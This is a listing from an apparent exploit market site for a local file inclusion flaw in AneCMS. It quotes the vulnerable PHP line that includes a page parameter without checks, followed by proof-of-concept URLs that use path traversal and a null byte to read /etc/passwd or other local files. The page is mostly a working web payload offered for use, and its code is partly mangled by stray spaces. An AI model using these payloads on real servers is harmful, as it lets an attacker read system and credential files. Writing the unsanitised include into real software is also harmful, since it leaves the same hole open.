[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AneCMS v.2e2c583 LFI exploit

Author
i2sec
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17621
Category
web applications
Date add
04-03-2012
Platform
php
# Exploit Title: AneCMS v.2e2c583 LFI exploit
# Date: 03.04.2012# Author: I2sec-PJH
# Software Link: https://github.com/AneGroup/AneCMS
# Version: v.2e2c583 -----------------------------------------------------
-Description vulnerabilities have been discovered in the index page.
-source of index.php
1. if (isset ($ _GET ['p']))2. include '. / pages /'. $ _GET ['p']. '. php';
-PoC
http://localhost/index.php?p=../../../../etc/passwd%00
http://localhost/index.php?p=../../../../[localfile]%00



#  0day.today [2024-10-05]  #